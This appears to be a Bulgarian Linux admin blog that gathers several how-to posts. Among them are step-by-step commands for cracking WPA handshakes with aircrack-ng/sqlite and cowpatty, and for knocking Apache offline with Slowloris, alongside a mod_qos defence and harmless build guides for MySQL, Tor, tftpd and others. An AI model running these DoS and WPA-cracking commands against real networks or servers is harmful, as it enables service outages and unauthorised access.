Мартин Петров Blog

Преди да компилираме aircrack с поддържка на sqlite трябва да го инсталираме както и неговия

development пакет:

apt-get install libsqlite3-dev sqlite3

Сега ще изтеглим aircrack и ще го компилираме със sqlite3 поддръжка:

cd /root/
mkdir testing;
cd testing;
mkdir aircrack_compile
cd aircrack_compile;

wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz
tar zxvf aircrack-ng-1.0.tar.gz
cd aircrack-ng-1.0

make sqlite=true unstable=true
make sqlite=true unstable=true install

Необходимо е да изпълним следната команда за да се изтегли OUI файла:

airodump-ng-oui-update

Излиза следното съобщение:

[*] Downloading IEEE OUI file…
[*] Parsing OUI file…
[*] Airodump-ng OUI file successfully updated

cd ..

Сега ще тестваме компилираният от нас aircrack като използваме wordlist без Sqlite:
Преди това може да видим каква е машината и забелязваме, че е двупроцесорна като всеки процесор е

3Ghz със 2 GB памет.

Сега ще тестваме с wordlist от 75000 ключа:

aircrack-ng -w /root/testing/wordlist.txt /root/testing/wireless_packets/wpa-01.cap

Забелязваме, че средно тества между 500-600 ключа за секунда

Което означава, че за да се тестват всичките ключове ще са необходими 75000/500=150 секунди=2.5 мин.

След като имам готов wordlist трябва да направя и ssidlist.txt където да опиша ssid-а на които ще

правим аудит:

vim ssidlist.txt

Сега ще подготвим нашата sqlite база за да тестваме aircrack със sqlite поддръжка.

След като вече компилирахме aircrack е необходимо да импортнем ssid-овете и списъка с пароли които

ще тестваме в sqlite базата mpetrov:

airolib-ng mpetrov1 --import essid /root/testing/ssidlist.txt
airolib-ng mpetrov1 --import passwd /root/testing/wordlist.txt
airolib-ng mpetrov1 --stats
airolib-ng mpetrov1 --clean all
airolib-ng mpetrov1 --batch (Изпълнението отнема доста време)
airolib-ng mpetrov1 --verify all

След като подготвихме базата ще направим тест на aircrack със sqlite

aircrack-ng –r mpetrov1 /root/testing/wireless_packets/wpa-01.cap

Опа. Забелязваме, че aircrack в комбинация със sqlite тества по 40 000 ключа за секунда или времето

което е необходимо за превъртането на този wordlist е по- малко от 2 секунди.

Разликата между нормален aircrack (2.5 мин.) и aircrack със sqlite поддържка (< 2 сек.) е повече от

ясна

Възможна грешка при компилирането на aircrack:

Грешка 1:
gcc -g -W -Wall -Werror -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=0  -I/usr/local/include -DHAVE_SQLITE

-Iinclude   -c -o aircrack-ng.o aircrack-ng.c
aircrack-ng.c:74:21: error: sqlite3.h: мЪЛЮ РЮЙЗБ ТЮИК ХКХ ДХПЕЙРНПХЪ
aircrack-ng.c:75: error: expected '=', ',', ';', 'asm' or '__attribute__' before '*' token
cc1: warnings being treated as errors
aircrack-ng.c: In function 'main':
aircrack-ng.c:4900: error: implicit declaration of function 'sqlite3_open'
aircrack-ng.c:4900: error: 'db' undeclared (first use in this function)
aircrack-ng.c:4900: error: (Each undeclared identifier is reported only once
aircrack-ng.c:4900: error: for each function it appears in.)
aircrack-ng.c:4901: error: implicit declaration of function 'sqlite3_errmsg'
aircrack-ng.c:4901: error: format '%s' expects type 'char *', but argument 3 has type 'int'
aircrack-ng.c:4902: error: implicit declaration of function 'sqlite3_close'
aircrack-ng.c:5561: error: implicit declaration of function 'sqlite3_mprintf'
aircrack-ng.c:5561: error: assignment makes pointer from integer without a cast
aircrack-ng.c:5563: error: implicit declaration of function 'sqlite3_exec'
aircrack-ng.c:5564: error: 'SQLITE_LOCKED' undeclared (first use in this function)
aircrack-ng.c:5564: error: 'SQLITE_BUSY' undeclared (first use in this function)
aircrack-ng.c:5570: error: 'SQLITE_OK' undeclared (first use in this function)
aircrack-ng.c:5570: error: 'SQLITE_ABORT' undeclared (first use in this function)
aircrack-ng.c:5572: error: implicit declaration of function 'sqlite3_free'
make[1]: *** [aircrack-ng.o] Error 1
make[1]: Leaving directory `/tmp/aircrack-ng-1.0/src'
make: *** [all] Error 2

Решение:
apt-get install libsqlite3-dev

Грешка 2:
In file included from aircrack-ng.c:65:
crypto.h:12:26: error: openssl/hmac.h: Няма такъв файл или директория
crypto.h:13:25: error: openssl/sha.h: Няма такъв файл или директория
crypto.h:15:25: error: openssl/rc4.h: Няма такъв файл или директория
crypto.h:16:25: error: openssl/aes.h: Няма такъв файл или директория
cc1: warnings being treated as errors
In file included from aircrack-ng.c:69:
sha1-sse2.h: In function ‘calc_4pmk’:
sha1-sse2.h:140: error: implicit declaration of function ‘HMAC’
sha1-sse2.h:140: error: implicit declaration of function ‘EVP_sha1’
aircrack-ng.c: In function ‘crack_wpa_thread’:
aircrack-ng.c:3910: error: implicit declaration of function ‘EVP_md5’
make[1]: *** [aircrack-ng.o] Error 1
make[1]: Leaving directory `/root/testing/aircrack_compile/aircrack-ng-1.0/src'
make: *** [all] Error 2

Решение: apt-get install libssl-dev

Според нашия Наказателен Кодекс манипулирането на wireless мрежи е незаконно:

Чл. 212а. (Нов -- ДВ, бр. 92 от 2002 г.) (1) (Изм. -- ДВ, бр. 38 от 2007 г.) Който с цел да набави за себе си или за другиго облага възбуди или поддържа заблуждение у някого, като внесе, измени, изтрие или заличи компютърни данни или използва чужд електронен подпис и с това причини на него или на другиго вреда, се наказва за компютърна измама с лишаване от свобода от една до шест години и глоба до шест хиляди лева.
(2) (Изм. -- ДВ, бр. 38 от 2007 г.) Същото наказание се налага и на този, който, без да има право, внесе, измени, изтрие или заличи компютърни данни, за да получи нещо, което не му се следва.

Вместо да правите такива гимнастики проосто си платете интернета и ще го имате винаги.

В предната публикация (Как да счупим Apache със Slowloris) обясних какво е Slowloris , за какво се ползва и  как работи т.е. как се чупи Apache с него. Както е все известно най- лесно е да се счупи нещо(като се ползва готов инструмент разбира се), но също интересно е и да имаме добри превантимни мерки.

За защита на Apache от Slowloris и други подобни DoS атаки ще използваме един сравнително млад модул за Apache: qos (http://sourceforge.net/projects/mod-qos/) .

mod_qos е quality of service(QOS) модул за Apache. Той изпълнява механизми за контрол които могат да предоставят различни приоритети на различните заявки и да контролира достъпа до сървъра на базата на наличните ресурси

1. Ще инсталираме необходимите ни пакети за компилацията
apt-get install apache2-threaded-dev gcc

2. Изтегляме qos модула
cd /tmp/
wget http://freefr.dl.sourceforge.net/project/mod-qos/mod-qos/9.7/mod_qos-9.7.tar.gz

3. Ще го разархивираме и компилираме
tar zxvf mod_qos-9.7.tar.gz
cd mod_qos-9.7/apache2/
apxs2 -i -c mod_qos.c

Става ясно, че се е инсталирал във "/usr/lib/apache2/modules"

4. Сега ще направим конфигурация на модула
cd /etc/apache2/mods-available/
vim qos.load

LoadModule qos_module /usr/lib/apache2/modules/mod_qos.so

vim qos.conf

## QoS Settings
<IfModule mod_qos.c>
# handles connections from up to 100000 different IPs
QS_ClientEntries 100000
# will allow only 50 connections per IP
QS_SrvMaxConnPerIP 50
# maximum number of active TCP connections is limited to 256
MaxClients              256
# disables keep-alive when 70% of the TCP connections are occupied:
QS_SrvMaxConnClose      180
# minimum request/response speed (deny slow clients blocking the server, ie. slowloris keeping connections open without requesting anything):
QS_SrvMinDataRate       150 1200
# and limit request header and body (carefull, that limits uploads and post requests too):
# LimitRequestFields      30
# QS_LimitRequestBody     102400
</IfModule>

5. Сега зареждаме qos модула и рестартираме apache:

a2enmod qos
/etc/init.d/apache2 restart

Сега системата ни е защитена от Slowloris. За целта от предния урок може да тествате да я атакувате и ще се съгласите.

PS: Надявам се, че ще има благодарни адмнистратори които са го пропуснали в близките 6-7 месеца случва се на всеки затова го правя, за да се информираме взаимно)

За целта ще използваме httpd DoS тулка популярна от средата на 2009 година, написана от RSnake от ha.ckers или т.н. Slowloris

Как Slowloris претоварва Apache ?

Slowloris прави много конекции и ги задържа отворени като изпраща части от HTTP заявки. Slowloris продължава да изпраща хедъри на интервали за да предпази сокетите от затваряне.

Преди да счупим Apache ще изтеглим Slowloris от http://ha.ckers.org/slowloris/ или по- точно от тук:

wget http://ha.ckers.org/slowloris/slowloris.pl

След това трябва да инсталираме необходими модули за Perl:

perl -MCPAN -e 'install IO::Socket::INET'
perl -MCPAN -e 'install IO::Socket::SSL'

или по- друг метод:

apt-get install libio-all-perl libio-socket-ssl-perl

След като инсталирахме модулите за perl трябва да инсталираме и perl-doc за да можем да разгледаме help страницата на Slowloris:

apt-get install perl-doc

Сега вече можем да стартираме Slowloris:

perl slowloris.pl

Извежда ни се първоначална инфо:

Welcome to Slowloris -- the low bandwidth, yet greedy and poisonous HTTP client

Usage:

perl slowloris.pl -dns [www.example.com] -options

Type 'perldoc slowloris.pl' for help with options.

Ето я и помощната страница:

perldoc slowloris.pl

TITLE
Slowloris

VERSION
Version 0.7 Beta

DATE
06/17/2009

AUTHOR
RSnake <h@ckers.org> with threading from John Kinsella

ABSTRACT
Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ulti‐
mately performs a fairly low bandwidth denial of service.  It has the added benefit of allowing the server to come back at any
time (once the program is killed), and not spamming the logs excessively.  It also keeps the load nice and low on the target
server, so other vital processes don’t die unexpectedly, or cause alarm to anyone who is logged into the server for other rea‐
sons.

AFFECTS
Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others…?

NOT AFFECTED
IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others…?

DESCRIPTION
Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you
can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of it’s threads as they
patiently wait for more data.  Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate
for that by customizing the timeouts.  There is an added function to help you get started with finding the right sized timeouts
as well.

As a side note, Slowloris does not consume a lot of resources so modern operating systems don’t have a need to start shutting
down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circum‐
stances.  Think of Slowloris as the HTTP equivalent of a SYN flood.

Testing

If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing:

Testing Example:

./slowloris.pl -dns www.example.com -port 80 -test

This won’t give you a perfect number, but it should give you a pretty good guess as to where to shoot for.  If you really must
know the exact number, you may want to mess with the @times array (although I wouldn’t suggest that unless you know what you’re
doing).

HTTP DoS

Once you find a timeout window, you can tune Slowloris to use certain timeout windows.  For instance, if you know that the server
has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and
increase the TCP timeout to 5 seconds.  The following example uses 500 sockets.  Most average Apache servers, for instance, tend
to fall down between 400-600 sockets with a default configuration.  Some are less than 300.  The smaller the timeout the faster
you will consume all the available resources as other sockets that are in use become available -- this would be solved by thread‐
ing, but that’s for a future revision.  The closer you can get to the exact number of sockets, the better, because that will
reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful.  Slowloris has no way to iden‐
tify if it’s successful or not though.

HTTP DoS Example:

./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5

HTTPReady Bypass

HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET
or HEAD request with the -httpready switch.

HTTPReady Bypass Example

./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready

Stealth Host DoS

If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host
using the -shost variable.  This way the logs that are created will go to a different virtual host log file, but only if they are
kept separately.

Stealth Host DoS Example:

./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com

HTTPS DoS

Slowloris does support SSL/TLS on an experimental basis with the -https switch.  The usefulness of this particular option has not
been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the
early phases of development.  Your mileage may vary.

HTTPS DoS Example:

./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https

HTTP Cache

Slowloris does support cache avoidance on an experimental basis with the -cache switch.  Some caching servers may look at the
request path part of the header, but by sending different requests each time you can abuse more resources.  The usefulness of
this particular option has not been thoroughly tested.  Your mileage may vary.

HTTP Cache Example:

./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
Issues
Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it’s
current incarnation.  They may be ways around this, but not in this version at this time.  Most likely most anti-DDoS and load
balancers won’t be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested.

Slowloris isn’t completely quiet either, because it can’t be.  Firstly, it does send out quite a few packets (although far far
less than a typical GET request flooder).  So it’s not invisible if the traffic to the site is typically fairly low.  On higher
traffic sites it will unlikely that it is noticed in the log files -- although you may have trouble taking down a larger site with
just one machine, depending on their architecture.

For some reason Slowloris works way better if run from a *Nix box than from Windows.  I would guess that it’s probably to do with
the fact that Windows limits the amount of open sockets you can have at once to a fairly small number.  If you find that you
can’t open any more ports than ~130 or so on any server you test -- you’re probably running into this "feature" of modern operat‐
ing systems.  Either way, this program seems to work best if run from FreeBSD.

Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or
proxy server will write to it’s logs with a lot of 400 (Bad Request) errors.  So while the sockets remain open, you won’t be in
the logs, but once the sockets close you’ll have quite a few entries all lined up next to one another.  You will probably be easy
to find if anyone is looking at their logs at that point -- although the DoS will be over by that point too.

What is a slow loris?
What exactly is a slow loris?  It’s an extremely cute but endangered mammal that happens to also be poisonous.  Check this out:

http://www.youtube.com/watch?v=rLdQ3UhLoD4

След като сме запознати с помощната страница ще направим един прост пример за чупене на Apache със Slowloris:

perl slowloris.pl -dns example.com -port 80 -timeout 1 -num 200 -cache

След известно време забелязваме, че Apache не отговаря- Той е счупен

Жертвата не вижда превишаване на ползваемостта на CPU от apache, не вижда и нищо в access лога, но ако пусне един tcpdump ще разбере за какво иде реч(tcpdump -i eth0 -vvvn dst port 80)

В следващата публикация  ще обясня как да се защитим от Slowloris- Как да защитим Apache от счупване причинено от Slowloris

В тази публикация мисля да опиша как се инсталират Nvidia драйверите под Debian Lenny.

1. apt-get install build-essential linux-headers-$(uname -r)
2. cd /usr/src
3. ln -s linux-headers-$(uname -r) linux
4. wget  http://us.download.nvidia.com/XFree86/Linux-x86/190.53/NVIDIA-Linux-x86-190.53-pkg1.run
5. /etc/init.d/gdm stop
6. cd /usr/src && sh NVIDIA-Linux-x86-190.53-pkg1.run

След това приеме лиценза на Nvidia и драйверите ще ви се инсталират. Сега ще стартираме нашата графична среда с nvidia драйверите: /etc/init.d/gdm start .Още в началото дори виждаме логото на Nvidia. Ако са необходими повече допълнителни настройки избираме Applications-> System Tools -> NVIDIA X Server Settings

coWPAtty е приложение което се използва за bruteforce на WPA PSK. Полезен е за аудит на вашата Wireless мрежа.

apt-get install && apt-get instal gcc libssl-dev libpcap-dev
wget http://wirelessdefence.org/Contents/Files/cowpatty-4.2.tgz
tar zxvf cowpatty-4.2.tgz
cd cowpatty-4.2
make

Тук го компилирах на една машинка и се сблъсках (LOL) със следните грешки като след всяка грешка е

решението .

Първа грешка:

cc -pipe -Wall -DOPENSSL  -O2 -g3 -ggdb   -c -o md5.o md5.c
md5.c:25:25: error: openssl/md5.h: мЪЛЮ РЮЙЗБ ТЮИК ХКХ ДХПЕЙРНПХЪ
md5.c: In function 'md5_mac':
md5.c:33: error: 'MD5_CTX' undeclared (first use in this function)
md5.c:33: error: (Each undeclared identifier is reported only once
md5.c:33: error: for each function it appears in.)
md5.c:33: error: expected ';' before 'context'
md5.c:34: warning: implicit declaration of function 'MD5_Init'
md5.c:34: error: 'context' undeclared (first use in this function)
md5.c:35: warning: implicit declaration of function 'MD5_Update'
md5.c:38: warning: implicit declaration of function 'MD5_Final'
md5.c: In function 'hmac_md5_vector':
md5.c:45: error: 'MD5_CTX' undeclared (first use in this function)
md5.c:45: error: expected ';' before 'context'
md5.c:53: error: 'context' undeclared (first use in this function)
make: *** [md5.o] Error 1

Решение: apt-get install libssl-dev

Втора грешка:
cc -pipe -Wall -DOPENSSL  -O2 -g3 -ggdb   -c -o sha1.o sha1.c
cc -pipe -Wall -DOPENSSL  -O2 -g3 -ggdb   -c -o utils.o utils.c
utils.c:34:18: error: pcap.h: мЪЛЮ РЮЙЗБ ТЮИК ХКХ ДХПЕЙРНПХЪ
In file included from utils.c:35:
utils.h:29: error: expected ')' before '*' token
utils.c:142: error: expected ')' before '*' token
make: *** [utils.o] Error 1

Решение: apt-get install libpcap-dev

В тази публикация ще опиша с няколко стъпки как  се инсталира, конфигурира и ползва Tor в GNU/Linux- Debian. Идеята е криптиране на връзката която ползвате или да имате по- добра анонимност в Интернет. Приложението е възможно освен за GNU/Linux така и за MS Windows и OS X и BSD.

Статията е за напълно начинаещи с напълно основни познания по всичко (Просто се изпълнява подред и това е )

1. Редактиране на файл: /etc/apt/sources.list :
#За Etch
deb     http://deb.torproject.org/torproject.org etch main
#За Lenny
deb     http://deb.torproject.org/torproject.org lenny main
#и т.н.

2. Инсталиране на sudo
apt-get install sudo

3. Зареждане на ключове:

gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

4. Ъпдейтване и инсталиране на tor

apt-get update && apt-get install tor tor-geoipdb privoxy

5. Редактиране на конф. файл на provixy (/etc/privoxy/config)
Добавете това(по този начин пренасочваме tor порта към 8118:

#added by amri
forward-socks4a / localhost:9050 .

6. Рестартиране на tor и privoxy
/etc/init.d/tor restart;
/etc/init.d/privoxy restart;

7. Тестване за анонимност

7.1 Тест, чрез links
links -http-proxy 127.0.0.1:8118 http://check.torproject.org/

7.2  Тест, чрез lynx
export http_proxy="http://127.0.0.1:8118";
lynx http://check.torproject.org/;

#Бележка: Когато сетвате http_proxy това важи и за apt т.е. ако искате да инсталирате нещо през apt-get ще минете през това прокси. За да го премахнете премахнете променливата или: export http_proxy="

PS: За Firefox е повече от ясно как се въвежда всичко

Тук в тази публикация ще опиша най- основния метод за инсталиране и "конфигуриране" на Trivial FTPD или tftpd .

#apt-get install tftpd

Понеже аз искам tftp директорията да не бъде тази по подразбиране, а друга /tftpboot ще трябва да променим последния аргумент в /etc/inetd.conf

Ето и финалния резултат:

tftp            dgram   udp     wait    nobody  /usr/sbin/tcpd  /usr/sbin/in.tftpd /tftpboot

За да рестартираме само inetd ще вземем номера на процеса и ще му изпратим заповед да бъде рестартиран (rofl)

#ps -aux | grep inetd|grep -v grep
root      2904  0.0  0.0   1952   660 ?        Ss   13:42   0:00 /usr/sbin/inetd

#kill -HUP 2904

От години не бях компилирал docsis и днес ми се наложи. Сблъсках се с няколко проблема при компилирането и реших да ги опиша тук.

CFLAGS=-lm ./configure

Проблем:

checking whether we are using the GNU C++ compiler… no
checking whether g++ accepts -g… no
checking dependency style of g++… none
checking how to run the C++ preprocessor… /lib/cpp
configure: error: C++ preprocessor "/lib/cpp" fails sanity check
See `config.log' for more details.

Решение: apt-get install g++

---
Проблем: checking for m4… /usr/bin/m4
configure: error:  GNU M4 is needed

Решение: Имате инсталиран m4, но уви не го приема. Ето го и решението:

Файл: configure
Заменяме

ac_is_gnu_m4=`echo $ac_m4_vers | cut -d' ' -f1`;

със

ac_is_gnu_m4=`echo $ac_m4_vers | grep -q GNU && echo GNU` ;

Файл: configure.in

Заменяте

ac_is_gnu_m4=`echo $ac_m4_vers | cut -d' ' -f1`;

със

ac_is_gnu_m4=`echo $ac_m4_vers | grep -q GNU && echo GNU` ;

Проблем:
checking for net-snmp-config… /usr/libexec/net-snmp-config
configure: error: You need at least net-snmp 5.0.7, get it at http://www.net-snmp.org

Решение: apt-get install libsnmp

Проблеми при "make"

Проблем:
checking for net-snmp-config… /usr/libexec/net-snmp-config
configure: error: You need at least net-snmp 5.0.7, get it at http://www.net-snmp.org

Решение: apt-get install libsnmp

Остава накрая: make install
и всичко е готово

#:/tmp/docsis-0.9.5# which docsis
/usr/local/bin/docsis

#:/tmp/docsis-0.9.5# docsis

DOCSIS Configuration File creator, version 0.9.5
Copyright (c) 1999,2000,2001 Cornel Ciocirlan, ctrl@users.sourceforge.net
Copyright (c) 2002,2003,2004,2005 Evvolve Media SRL, docsis@evvolve.com

To encode a cable modem configuration file:
docsis -e <modem_cfg_file> <key_file> <output_file>
To encode multiple cable modem configuration files:
docsis -m <modem_cfg_file1> …  <key_file> <new_extension>
To encode a MTA configuration file:
docsis -p <mta_cfg_file> <output_file>
To encode multiple MTA configuration files:
docsis -m -p <mta_file1> …  <new_extension>
To decode a CM or MTA config file:
docsis -d <binary_file>

Where:
<cfg_file>              = name of text (human readable) cable modem or MTA
configuration file
<key_file>              = text file containing the authentication key
(shared secret) to be used for the CMTS MIC
<output_file>           = name of output file where the binary data will
be written to (if it does not exist it is created).
<binary_file>           = name of binary file to be decoded
<new_extension>         = new extension to be used when encoding multiple files

See examples/*.cfg for configuration file format.

Please send bugs or questions to docsis-users@lists.sourceforge.net

Преди време един приятел имаше проблем с това и му казах да използва ntpdate, но трябвало да търси ntp сървъри и бла бла.

За целта ето решението за всички които трябва да сверят своята дата под GNU/Linux:

apt-get install ntpdate;

ntpdate 0.debian.pool.ntp.org 1.debian.pool.ntp.org 2.debian.pool.ntp.org 3.debian.pool.ntp.org

Като отговор ще получите това:
31 Oct 21:19:42 ntpdate[9326]: step time server 94.26.2.134 offset -10472.841536 sec

PS: Ако искате да сложите дата и час по ваш избор, то това става по следния метод:

date -s "2009-10-31 16:21:42"

За да компилирате първо трябва да изтеглите Mysql 5.1.40  от ТУК (21.1 MB)
wget http://dev.mysql.com/get/Downloads/MySQL-5.1/mysql-5.1.40.tar.gz/from/http://mysql.online.bg/

Разархивирате  и конфигурирате mysql 5.1.40:

./configure --prefix=/usr/local/mysql \
--enable-thread-safe-client --enable-local-infile \
--with-pic --with-fast-mutexes --disable-shared \
--with-big-tables --with-readline --with-plugins=innobase \
--with-mysqld-user=mysql --with-extra-charsets=all

Компилирате и инсталирате mysql 5.1.40:
make && make install

За по- добра сигурност на mysql 5.1.40 да се изпълнява mysql потребител:

sudo groupadd mysql
sudo useradd -g mysql mysql

Проблеми които възникнаха при конфигурирането, компилирането,  инсталирането и стартирането на mysql 5.1.40:

Проблем при конфигурирането:
/bin/rm: cannot remove `libtoolT': No such file or directory
config.status: executing default commands
Решение (проблема не е особено сериозен(за мен няма такъв проблем, но така да го кажа)- Проблемът си е проблем) по- долу:

Проблем: При изпълнение на "libtoolize --force"
Using `AC_PROG_RANLIB' is rendered obsolete by `AC_PROG_LIBTOOL'

Решение:
Редактиране на configure.in (в директорията на mysql-5.1) коментирате 230 ред (#AC_PROG_RANLIB) .
Пример на configure.in:

# Still need ranlib for readline; local static use only so no libtool.
#AC_PROG_RANLIB
# We use libtool
#AC_LIBTOOL_WIN32_DLL
AC_PROG_LIBTOOL

Проблем: При изпълнение на "libtoolize --force"
изникна грешка: "You should update your `aclocal.m4' by running aclocal."
Решение: aclocal

Проблем: При изпълнение на aclocal
/usr/share/aclocal/libmcrypt.m4:17: warning: underquoted definition of AM_PATH_LIBMCRYPT
run info '(automake)Extending aclocal'
or see http://sources.redhat.com/automake/automake.html#Extending-aclocal

Решение:
Проблемът е във файл "libmcrypt.m4" или "/usr/share/aclocal/libmcrypt.m4" , ред 17:
AC_DEFUN(AM_PATH_LIBMCRYPT,

За да поправим проблема редактираме 17-ти ред по следния начин:
AC_DEFUN([AM_PATH_LIBMCRYPT],

Проблем: При ./configure
/tmp/mysql-5.1.40/missing: line 54: automake-1.10: command not found
WARNING: `automake-1.10' is missing on your system.  You should only need it if
you modified `Makefile.am', `acinclude.m4' or `configure.in'.
You might want to install the `Automake' and `Perl' packages.
Grab them from any GNU archive site.

Решение: apt-get install automake

Проблем: При стартиране на Mysqld със: /usr/local/mysql/libexec/mysqld --user=mysql &
се получава следната грешка:
[ERROR] Can't find messagefile '/usr/share/mysql/english/errmsg.sys'
Решение: ln -s /usr/local/mysql/share/mysql/ /usr/share/mysql

alpha:~# /usr/local/mysql/bin/mysqld_safe --user=mysql
091026 18:16:16 mysqld_safe Logging to '/usr/local/mysql/var/alpha.err'.
touch: cannot touch `/usr/local/mysql/var/alpha.err': No such file or directory
chown: cannot access `/usr/local/mysql/var/alpha.err': No such file or directory
091026 18:16:16 mysqld_safe Starting mysqld daemon with databases from /usr/local/mysql/var
/usr/local/mysql/bin/mysqld_safe: line 100: /usr/local/mysql/var/alpha.err: No such file or directory
/usr/local/mysql/bin/mysqld_safe: line 137: /usr/local/mysql/var/alpha.err: No such file or directory
091026 18:16:16 mysqld_safe mysqld from pid file /usr/local/mysql/var/alpha.pid ended
/usr/local/mysql/bin/mysqld_safe: line 100: /usr/local/mysql/var/alpha.err: No such file or directory

Решение:
mkdir /usr/local/mysql/var/;
chown mysql.mysql /usr/local/mysql/var/;

Проблем при стартиране на mysqld_safe:
091026 18:46:17 [Warning] The syntax '--log' is deprecated and will be removed in MySQL 7.0. Please use

'--general_log'/'--general_log_file' instead.
091026 18:46:17 [Warning] The syntax '--log_slow_queries' is deprecated and will be removed in MySQL 7.0. Please use

'--slow_query_log'/'--slow_query_log_file' instead.

Решение: В /etc/mysql/my.cnf заменяме "log" със "general_log" и "log-slow-queries" със "slow_query_log"

Друг проблем: 091026 18:50:05 [ERROR] /usr/local/mysql/libexec/mysqld: unknown option '--skip-bdb'

Решение: премахвате просто skip-bdb

Стартиране на mysql 5.1.40:
/usr/local/mysql/bin/mysqld_safe --user=mysql &

Спиране на mysql 5.1.40:
/usr/local/mysql//bin/mysqladmin shutdown

Примерен конфигурационен файл my.cnf
(Поставям го в /etc/mysql/my.cnf (Допада ми Debian layoute -a). Може да се добави и в /etc/my.cnf . Когато се стартира mysqld_safe той автоматично проверява на тези места за конфигурационен файл и ако го намери го зарежда).:

# The MySQL server 5.1.40. My.cnf generated by amri, Mon Oct 26 19:07:30 EET 2009

[mysqld]
port            = 3306
datadir=/var/lib/mysql
socket=/var/run/mysqld/mysqld.sock

# Try number of CPU's*2 for thread_concurrency
thread_concurrency = 2

# Section Logging
general_log=/var/log/mysql/mysql.log
log-bin=/var/log/mysql/mysql-bin.log
slow_query_log=/var/log/mysql/mysql_slow.log
long_query_time=10

#Section Skip
skip-locking

#Server ID
server-id       = 1

# Optimized
key_buffer = 512M
key_buffer_size = 384M

wait_timeout=360

max_allowed_packet = 16M

read_buffer_size = 2M
sort_buffer_size = 2M
net_buffer_length = 8K
read_rnd_buffer_size = 8M
myisam_sort_buffer_size = 64M

max_connections = 600

join_buffer_size = 1M
read_buffer_size = 1M
sort_buffer_size = 2M
table_cache = 1024
table_open_cache = 512
thread_cache_size = 64

query_cache_limit = 1M
query_cache_size = 32M
query_cache_type = 1

set-variable = max_connections=1400
set-variable = max_connect_errors=150

[client]
port    = 3306
socket=/var/run/mysqld/mysqld.sock

[mysqldump]
quick
max_allowed_packet = 16M

[mysql]
no-auto-rehash
# Remove the next comment character if you are not familiar with SQL
#safe-updates

[myisamchk]
key_buffer_size = 256M
sort_buffer_size = 256M
read_buffer = 2M
write_buffer = 2M

[mysqlhotcopy]
interactive-timeout

Стойностите които са в този конфигурационен файл са използвани за тестове. Не мога да ги препоръчам за стабилен mysql.

Примерен mysql.server.sh :

#!/bin/sh
# Copyright Abandoned 1996 TCX DataKonsult AB & Monty Program KB & Detron HB
# This file is public domain and comes with NO WARRANTY of any kind

# MySQL daemon start/stop script.

# Usually this is put in /etc/init.d (at least on machines SYSV R4 based
# systems) and linked to /etc/rc3.d/S99mysql and /etc/rc0.d/K01mysql.
# When this is done the mysql server will be started when the machine is
# started and shut down when the systems goes down.

# Comments to support chkconfig on RedHat Linux
# chkconfig: 2345 64 36
# description: A very fast and reliable SQL database engine.

# Comments to support LSB init script conventions
### BEGIN INIT INFO
# Provides: mysql
# Required-Start: $local_fs $network $remote_fs
# Should-Start: ypbind nscd ldap ntpd xntpd
# Required-Stop: $local_fs $network $remote_fs
# Default-Start:  2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: start and stop MySQL
# Description: MySQL is a very fast and reliable SQL database engine.
### END INIT INFO

# If you install MySQL on some other places than @prefix@, then you
# have to do one of the following things for this script to work:
#
# -- Run this script from within the MySQL installation directory
# -- Create a /etc/my.cnf file with the following information:
#   [mysqld]
#   basedir=<path-to-mysql-installation-directory>
# -- Add the above to any other configuration file (for example ~/.my.ini)
#   and copy my_print_defaults to /usr/bin
# -- Add the path to the mysql-installation-directory to the basedir variable
#   below.
#
# If you want to affect other MySQL variables, you should make your changes
# in the /etc/my.cnf, ~/.my.cnf or other MySQL configuration files.

# If you change base dir, you must also change datadir. These may get
# overwritten by settings in the MySQL configuration files.

basedir="/usr/local/mysql";
datadir="/var/lib/mysql";

# Default value, in seconds, afterwhich the script should timeout waiting
# for server start.
# Value here is overriden by value in my.cnf.
# 0 means don't wait at all
# Negative numbers mean to wait indefinitely
service_startup_timeout=900

# The following variables are only set for letting mysql.server find things.

# Set some defaults
pid_file="/var/run/mysqld/mysqld.pid";
server_pid_file="/var/run/mysqld/mysqld.pid";
use_mysqld_safe=1
user=@MYSQLD_USER@
if test -z "$basedir"
then
basedir=@prefix@
bindir=@bindir@
if test -z "$datadir"
then
datadir=@localstatedir@
fi
sbindir=@sbindir@
libexecdir=@libexecdir@
else
bindir="$basedir/bin"
if test -z "$datadir"
then
datadir="$basedir/data"
fi
sbindir="$basedir/sbin"
libexecdir="$basedir/libexec"
fi

# datadir_set is used to determine if datadir was set (and so should be
# *not* set inside of the --basedir= handler.)
datadir_set=

#
# Use LSB init script functions for printing messages, if possible
#
lsb_functions="/lib/lsb/init-functions"
if test -f $lsb_functions ; then
. $lsb_functions
else
log_success_msg()
{
echo " SUCCESS! $@"
}
log_failure_msg()
{
echo " ERROR! $@"
}
fi

PATH=/sbin:/usr/sbin:/bin:/usr/bin:$basedir/bin
export PATH

mode=$1    # start or stop
shift
other_args="$*"   # uncommon, but needed when called from an RPM upgrade action
